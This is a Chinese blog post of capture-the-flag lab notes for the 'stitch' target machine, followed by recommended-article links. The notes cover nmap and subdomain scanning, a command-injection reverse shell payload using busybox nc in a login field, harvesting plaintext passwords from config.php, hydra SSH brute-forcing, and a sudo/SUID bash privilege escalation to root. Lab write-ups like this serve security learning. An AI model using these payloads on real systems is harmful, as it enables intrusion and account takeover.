stitch靶场学习笔记

晓梦林2026-05-22 13:22

正文

kali攻击机地址:192.168.1.4

靶场地址:192.168.1.19

1、端口扫描

在kali里,使用nmap工具:

bash 复制代码 
nmap -sV -v -T4 -A 192.168.1.19

22和80端口是开放的。进入网页,发现域名stitch.dsz

2、域名重定向

修改kali中hosts:

bash 复制代码 
 vi /etc/hosts

进入hosts文件里,添加:

bash 复制代码 
192.168.1.19 stitch.dsz

:wq!退出,重新访问http://stitch.dsz ,发现域名重定向了:

使用子域名扫描工具:

bash 复制代码 
wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u stitch.dsz -H 'Host:FUZZ.stitch.dsz' --hw 1348

扫出来3个子域名,http://mail.stitch.dszhttp://dog.stitch.dszhttp://iot.stitch.dsz:

重新编辑kali里面的/etc/hosts文件:

bash 复制代码 
192.168.1.19 stitch.dsz dog.stitch.dsz mail.stitch.dsz iot.Stitch.dsz

顺便修改windows下的Hosts文件:

bash 复制代码 
C:\Windows\System32\drivers\etc\hosts

3、NC反弹

登录http://iot.stitch.dsz/,爆破用户名和密码的时候,可以对用户名构造nc连接语句:

bash 复制代码 
;busybox nc 192.168.1.4 4444 -e /bin/bash;

调整格式:

bash 复制代码 
/usr/bin/script -qc /bin/bash /dev/null
CTRL+Z
stty raw -echo;fg
reset
xterm
cd ..
find ./

4、文件查找

/www目录下有个./dog/config.php文件:

可以发现里面存了一堆密码:

bash 复制代码 
3c4900896d92da
3c4900896d92da789abc
s3cur3P@ssw0rd

5、iiiii用户登录

先拿iiiii:3c4900896d92da对应的用户名、密码远程访问iiiii用户:

bash 复制代码 
su - iiiii

6、/HOME下多用户筛选

筛选/home目录下的所有用户:

bash 复制代码 
#写法1
ls -al | awk '{print $NF}'
#写法2,输出结果跳过前三行
ls -al | awk ' NR>3 {print $NF}'

7、多用户爆破

bash 复制代码 
hydra -L usr.txt -P pass1.txt ssh://192.168.1.19 -I -e nrs

切换iotuser用户后,发现可以执行iot_runner的脚本:

8、iot_runner程序漏洞利用

iotuser用户下操作:

bash 复制代码 
cd /tmp
vi a.sh
IOT#
chmod +s /bin/bash

chmod 600 /tmp/a.sh

iiiii用户下操作:

bash 复制代码 
sudo /usr/bin/push_iot /tmp/a.sh

iotuser用户下操作:

bash 复制代码 
sudo /usr/bin/iot_runner a.sh
bash -p

大致意思解释 :

(1)在 iotuser 下:创建恶意脚本

bash 复制代码 
cd /tmp        # 进入临时目录(所有人可写)
vi a.sh        # 创建脚本 a.sh

脚本内容 最关键

复制代码 
chmod +s /bin/bash
  • chmod +s:给文件设置 SUID 权限
  • /bin/bash:系统的 bash 命令行工具
  • 效果 :让 /bin/bash 变成 任何人运行都直接获得 root 权限

(2)设置脚本权限

bash 复制代码 
chmod 600 /tmp/a.sh
  • 让脚本只能被 iotuser 读写
  • 避免被其他用户修改或删除

(3)在 iiiii 用户下:把脚本推给 iot_runner

bash 复制代码 
sudo /usr/bin/push_iot /tmp/a.sh

作用:

  • /tmp/a.sh 放到 iot_runner 可以执行的位置
  • 让后面的 iot_runner 能找到并运行它

( 4)回到 iotuser以 root 权限执行恶意脚本

bash 复制代码 
sudo /usr/bin/iot_runner a.sh

  1. iot_runnerroot 权限运行

  2. 它执行了你的 a.sh

  3. a.sh 执行:

    bash 复制代码 
    chmod +s /bin/bash

    结果:/bin/bash 获得了 SUID root 权限

(5)最终:拿到 root 权限

bash 复制代码 
bash -p

-p 是什么?

  • 保留 SUID 权限
  • 不降级权限
  • 直接以 root 身份打开 shell

执行完这一句,你就已经 从普通用户 → 变成 root 了!

相关推荐
prog_61033 小时前
【笔记】用cursor手搓cursor(六)deepseek v4
人工智能·笔记·agent·deepseek·claude code
z200509303 小时前
【linux学习】linux的一些奇怪知识,方便日常使用
学习
ouliten3 小时前
[Triton笔记4]低内存 Dropout
笔记·triton
凌波粒3 小时前
深度学习入门(鱼书)第2章笔记——感知机
人工智能·笔记·深度学习
魔法阵维护师4 小时前
从零开发游戏需要学习的c#模块,第十三章(rpg小游戏入门,下篇,地图敌人与战斗触发)
学习·游戏·c#
. . . . .4 小时前
业务知识学习
学习
RainCityLucky4 小时前
Java Swing 自定义组件库分享(七)
java·笔记·后端
_Evan_Yao4 小时前
如何搭建属于自己的技术博客(CSDN / GitHub Pages)
后端·学习·github
清平乐的技术专栏4 小时前
【Kafka笔记】(一)认识 Kafka
笔记·分布式·kafka
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03CC-Switch & Claude 基于 Linux 服务器安装使用指南04装上就回不去了:CodeGraph 让 AI 编程效率飙升 92%,它到底做了什么?05【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07【AI】2026 年具身智能模型和世界模型总结08几个好用的ip纯净度检测网站09用了半年 OpenRouter,我换到了 Ofox.ai — 两个 AI API 聚合平台的真实对比10codex app每次打开重连5次Reconnecting问题解决